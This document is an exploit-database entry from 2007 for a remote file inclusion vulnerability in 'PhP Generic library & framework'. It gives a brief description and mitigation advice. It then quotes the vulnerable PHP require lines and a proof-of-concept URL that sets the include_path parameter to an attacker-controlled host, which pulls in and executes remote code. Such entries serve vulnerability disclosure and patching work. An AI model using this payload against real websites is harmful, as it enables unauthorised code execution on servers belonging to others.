header-logo
Suggest Exploit
vendor:
PhP Generic library & framework
by:
xoron
7.5
CVSS
HIGH
Remote File Include
File Inclusion
CWE
Product Name: PhP Generic library & framework
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Not specified
2007

PhP Generic library & framework (include_path) Remote File Include Exploit

This exploit targets a vulnerability in the PhP Generic library & framework where an attacker can include remote files using the 'include_path' parameter. By manipulating the 'include_path' parameter, an attacker can execute malicious code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input and sanitize any input used in file inclusion functions. Additionally, restricting access to sensitive files and directories can help prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

-----------------------------------------------

PhP Generic library & framework (include_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz

-----------------------------------------------

Code:

require $GLOBALS[include_path]."configmember.php";
require $GLOBALS[include_path]."inc-membreManager.php";

-----------------------------------------------

POC:

www.[target].com/[script_pat]/membres/membreManager.php?include_path=http://evilscripts?

-----------------------------------------------

download: http://sourceforge.net/project/showfiles.php?group_id=72529

-----------------------------------------------

xoron gider izi kalir, selametle.

kaybetmenin tiryakisi bir çoçuk xoron.

-----------------------------------------------

# milw0rm.com [2007-01-28]